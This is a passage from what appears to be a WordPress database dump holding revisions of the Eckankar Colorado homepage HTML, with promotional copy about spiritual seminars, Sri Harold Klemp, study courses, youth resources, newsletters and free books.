right\"></i></a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\n<div class=\"container\">\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\n</div>\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\n<p class=\"\" style=\"font-size: 17px; font-weight: 600;\" data-font-weight=\"600\">Ready to get your keys to spiritual transformation?</p>\n</div>\n</div>\n</div>\n</div>','Home','','inherit','closed','closed','','7160-autosave-v1','','','2023-11-21 09:31:10','2023-11-21 16:31:10','',7160,'https://eckankar-colorado.org/?p=269396',0,'revision','',0),(269397,2,'2023-11-17 11:50:20','2023-11-17 18:50:20','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-17 11:50:20','2023-11-17 18:50:20','',7160,'https://eckankar-colorado.org/?p=269397',0,'revision','',0),(269398,2,'2023-11-17 12:00:49','2023-11-17 19:00:49','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div 